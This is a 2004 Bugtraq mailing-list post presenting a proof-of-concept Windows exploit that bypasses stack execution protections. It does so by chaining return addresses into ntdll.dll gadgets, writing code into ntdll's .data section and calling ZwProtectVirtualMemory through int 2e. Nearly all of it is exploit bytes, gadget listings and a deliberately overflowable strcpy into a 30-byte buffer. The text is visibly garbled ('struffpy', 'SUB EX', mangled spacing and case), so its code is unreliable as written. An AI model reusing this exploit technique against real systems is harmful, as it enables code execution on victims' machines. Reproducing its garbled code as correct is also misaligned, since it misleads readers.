Shellcode Avoiding Stack Protections Sample -------- Vallez29A

-------------------------------------------------- ---------- from: to: bugtraq@securityfocus.comSubject: Avoiding StackGuarddate: 18 Oct 2004 19:16:24 -0000

Hi, IM Posting Here a manner for avoiding stackguard. Shellcode without Zeros.

/ ************************************************** ************** / * Shellcode Avoiding Stack Protections Sample -------- Vallez / 29A * // ********************** ********************************************************* /

/ * All we have listened about stack protections. Security products are protecting stacks of code executed there. New hardware too, that will not let you to execute code in a not executable memory (amd64 for example).

Doing Shellcodes Avoiding this Fact is not Very Complex, As I Will Show with this small sample.

The idea is to use pieces of code of dlls for example. In this code im using pieces of code of ntdll for doing mypurposes. How? Easy, with the stack overflow we will leave in the stack ret addresses for conduction our thread to code in NTDLL.DLL. EXACTLY WE Are Using these Codes in ntdll:

-------------------------------------------------- -----------------------------------------

.78462fdf: ab stosd.78462fe0: 5f pop EDI.78462FE1: C20400 RETN 00004

-------------------------------------------------- -----------------------------------------

.784635ec: 8bc6 MOV Eax, ESI.784635EE: 5F POP EDI.784635EF: 5E POP ESI.784635F0: C3 RETN

-------------------------------------------------- -----------------------------------------

.7849da92: 0fc8 bswap EAX.7849DA94: C3 RETN ----------------------------------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------- -

.784680DA: CD2E INT 02E.784680DC: C3 RETN

-------------------------------------------------- -----------------------------------------

.784AFAAD: POP EAX RETN

-------------------------------------------------- -----------------------------------------

.7846bbe8: POP ECX RETN

-------------------------------------------------- -----------------------------------------

.784633AF: SUB EAX, ECX SAR Eax, 1 DEC EAX RETN

-------------------------------------------------- -----------------------------------------

.78466B22: SUB EX, ECX POP EDI POP ESI POP EBX RETN C

-------------------------------------------------- -----------------------------------------

.78499442: POP EDX RETN

-------------------------------------------------- ----------------------------------------- * /

/ * This sample will work with ntdll Version:. 5.0.2195.6899 The code should be compiled withvisual studio 6.0 in debug and default options for the project (really, only open the .c with visual studio and F7, and yes, yes.. .. * /

#include

#define debugz

#ifdef debugz

/ * For debugging we have actid debugz for giving the shellcode directly to func (), But this shellcode could goeth performance as argv [1]

* /

Char Exploit [] = {'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A', 'A' ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 0xAD, 0xfa, 0x4a, 0x78, // Here we are overwriting return eip func () goto pop eax / round0x90,0x90,0x90,0 x90, 0x90,0x90,0x90, // this nops are part of the code That We will dump to .data of NTDLL EAX = 0x909090900xe0, 0x2f, 0x46, 0x78, // goto pop EDI / RETN4 0X21, 0X21, 0X4B, 0X78, // EDI = 0x784621210XDF, 0x2F, 0x46, 0X78, // goto stosd / pop eDi / RETN 4'A ', 'A', 'A', 'A', // Trash for Retn40x21 4,0x21,0x4b, 0x78, // next part of ntdll .data where we will write out d o0xad, 0xfa, 0x4a, 0x78, // goto Pop Eax / Retn'A ',' A ',' A ',' A ', 0x90, 0x90, 0x90, 0x90, // This Nops Are Part of The Code That We Will Dump To .data of NTDLL0XDF, 0x2F, 0x46 , 0x78, // goto stosd / pop eDI / RETN 40X21 8, 0X21, 0X4B, 0x78, // Next Part of NTDLL .DATA WHERE WE WILL WRITEURE CODE0XAD, 0XFA, 0X4A, 0X78, // Goto Pop Eax / Retn 'a', 'a', 'a', 'a', 0x90, 0x90, 0x90,0xcc, // this nops area part of the code That We will dump to .data of ntdll0xdf, 0x2 F, 0x46,0x78, // goto stosd / pop edi / retn 4 // start with parameters // now we should give execution access to .data with // ZwVirtualProtectMemory (0xFFFFFFFF, 0x784b2121,0x000000ff, 0x00000040,0x784b2121 0x70); 0x21 0x30, 0x21, 0x4b, 0x78, // next part of ntdll.data where we will write u d a w, 0xfa, 0x4a, 0x78, // goto pop eax / ran'a ','

A ',' A ',' A ', 0xFF, 0xFF, 0xFF, 0xFF, // Parameters for ZWVIRTUALPROTECTMEMORY. this process, 0xffffffffff.0xdf, 0x2f, 0x46,0x78, // goto stosd / pop EDI / RETN 40X21 0x34 , 0x21, 0x4b, 0x78, // next part of ntdll .data where we will write out0xad, 0xfa, 0x4a, 0x78, // goto pop eax / ran'a ',' a ',' a ',' a ' , 0x21 0x58,0x21,0x4b, 0x78, // parameters for ZwVirtualProtectMemory. addr of variable keeping addr of mem0xDF, 0x2F, 0x46,0x78, // goto stosd / pop edi / retn 40x21 0x58,0x21,0x4b, 0x78, // we must write here the add do executable0xad, 0xfa, 0x4a, 0x78, // goto pop eax = 0x784b2121'a ',' a ',' a ',' a ', // trash for RETN 40X21, 0X21, 0X4B, 0x78, // for Poping to Eax0xdf, 0x2f, 0x46,0x78, // goto stosd / pop EDI / REN 4'A ',' A ',' A ',' A ', // Trash for edi // the next parameter Has Zeros, So We Cant Have It in shellcode.we Will get in Eax = 0x00000040

0xAD, 0xfa, 0x4a, 0x78, // goto pop eax = 0xffffffff'A ',' a ',' a ',' a ', // trash for Retn 40xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0XBB, 0X46, 0x78, // goto pop ECX = 0xfffffBF0xFF, 0xFF, 0xFF, 0xBF, 0x22, 0X6B, 0X46, 0X78, // Goto Sub EAX, ECX / POP EDI / POP ESI / POP EBX / RETN C0x21 0x3c, 0x21, 0x4b, 0x78, // other addr in .data'a ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 0x92, 0xDA, 0x49, 0x78, / / GOTO BSWAP EAX, RETN'A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 'a', 0xDF, 0x2F, 0x46, 0x78, // goto stosd / pop eDI / RETN 4 // EAX = 0x00000040 EDI = Next Addr We Will Write 0x40, Flags0x21 0x54, 0x21, 0x4b, 0x78, // Other AddR IN.DATA0XDF, 0x2F, 0x46, 0x78, // goto stosd / pop EDI / RETN 4'A ',' A ',' A ',' A ', 0x21 0x40, 0x21, 0x4b, 0x78, // Next Part of NTDLL.DATA WHERE WE WILL WRITE PARAMS0XAD, 0xFA, 0x4A, 0x78, // Goto Pop Eax / Retn'A ',' A ',' A ',' A ', 0x21 0x50, 0x21, 0x4b, 0x78, / / old protect returned as IO param in ZwVirtualProtectMemory0xDF, 0x2F, 0x46,0x78, // goto stosd / pop edi / retn 40x21 0x38,0x21,0x4b, 0x78, // other part to write, in this case the addr of the variable Storing Size for API0XA D, 0xfa, 0x4a, 0x78, // goto pop eax / Retn'A ',' a ',' a ',' a ', 0x21 0x54, 0x21, 0x4b, 0x78, // addr where size is stored, poped With pop eax0xdf, 0x2f, 0x46,0x78, // goto stosd / pop eDI / RETN 4'A ',' A ',' A ',' A ', // Trash for Poping to EDI // NOW WE MUST CALL INT 2e with eax = 0x77 and edx = 0x784b2151

0xAD, 0xfa, 0x4a, 0x78, // goto pop eax = 0xffffffff'A ',' a ',' a ',' a ', // trash0xff, 0xFF, 0xFF, 0xFF, 0xE8, 0XBB, 0X46, 0X78, / / goto pop ecx = 0xffffff880xff, 0xff, 0xff, 0x88, 0x22,0x6b, 0x46,0x78, // goto Sub Eax, ECX / POP EDI / POP ESI / POP EBX / RETN C'A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ', 0x42, 0X94, 0X49, 0X78, // goto POP EDX, RETN'A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ',' A ' , 0x21 0x30, 0x21, 0x4b, 0x78, // pop to edx address of params for zwvirtualprotectMemory0x92,0x4,0x49,0x78, // goto bswap eax, retrn // EAX = 0x77 (Service ID) EDX-> params0XDA, 0x80 , 0x46, 0x78, // goto int 2e, Retn0x21,0x21,0x4b, 0x78, // we have copied all the code what we need, so we jump what code in .data of NTDLL.

}; char * pexploit [2] = {EXPLOIT, EXPLOIT}; # Endif

Void Func (int Argc, char ** argv) {char buffer [30];

IF (argc> 1) {struffpy (buffer, argv [1]);}}

Void main (int Argc, char ** argv) {

#ifndef debugz func (argc, argv); # else func (argc, pexploit); # endif}

/ * This is a example for Winnt with NTDLL.DLL VERSION: 5.0.2195.6899. ITS Only A Proof of Concept About How shellcodes Could Avoid Stack Protections.

This shellcode is not executed in the stack, however it has in the stack the useful values ​​for conducting the thread to ntdll code and forcing this code to write executable code to ntdll .data section. If today not, in the future all not executable memory will be protected against execution, so we call ZwProtectVirtualMemory for setting .data zone where we have writed as executable (for this purpose we will dump parameters of the api to .data, in other part, and then pointing edx to that parameters and calling int 2e with eax = 0x77, the service id. * // *

Parts of NTDLL:

-------------------------------------------------- -----------------------------------------

.78462fdf: ab stosd.78462fe0: 5f pop EDI.78462FE1: C20400 RETN 00004

-------------------------------------------------- -----------------------------------------

.784635ec: 8bc6 MOV Eax, ESI.784635EE: 5F POP EDI.784635EF: 5E POP ESI.784635F0: C3 RETN

-------------------------------------------------- -----------------------------------------

.7849da92: 0fc8 bswap eax.7849da94: c3 retent

-------------------------------------------------- -----------------------------------------

.784680DA: CD2E INT 02E.784680DC: C3 RETN

-------------------------------------------------- -----------------------------------------

.784AFAAD: POP EAX RETN

-------------------------------------------------- -----------------------------------------

.7846bbe8: pop ECX RETN ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -----------------------------------------------

.784633AF: SUB EAX, ECX SAR Eax, 1 DEC EAX RETN

-------------------------------------------------- -----------------------------------------

.78466B22: SUB EX, ECX POP EDI POP ESI POP EBX RETN C

-------------------------------------------------- -----------------------------------------

.78499442: POP EDX RETN

-------------------------------------------------- -----------------------------------------

.DATA (NTDLL.DLL) 784B0000 --- for Copying The Code There.

Number Name VirtSize RVA PhysSize Offset Flag- 1 .text 00045CAB 00001000 00045E00 00000400 60000020 2 ECODE 00004371 00047000 00004400 00046200 60000020 3 PAGE 00003FEB 0004C000 00004000 0004A600 60000020 4 .data 00002D84 00050000 00002200 0004E600 C0000040 5 .rsrc 0002D000 00053000 0002C400 00050800 40000040 6 .reloc 00002010 000800 0000200 0007CC00 42000040

-------------------------------------------------- -----------------------------------------

Info of My NTDLL: ----------------

Version:?? 5.0.2195.6899 Count of sections 6 Machine intel386 Symbol table 00000000 [00000000] Wed Mar 24 03:17:14 2004 Size of optional header 00E0 Magic optional header 010B Linker version 5.12 OS version 5.00 Image version 5.00 Subsystem??? version 4.00 Entry point 00000000? Size of code 0004E200 Size of init data 00030800? Size of uninit data 00000000 Size of image 00083000? Size of header 00000400 Base of code 00001000? Base of data 0004E000 Image base 78460000? Subsystem Windows char Section alignment 00001000? File alignment 00000200 stack 00040000/00001000 Checksum 00082A23? Number of DirectorIES 16 * /

-------------------------------------------------- ------------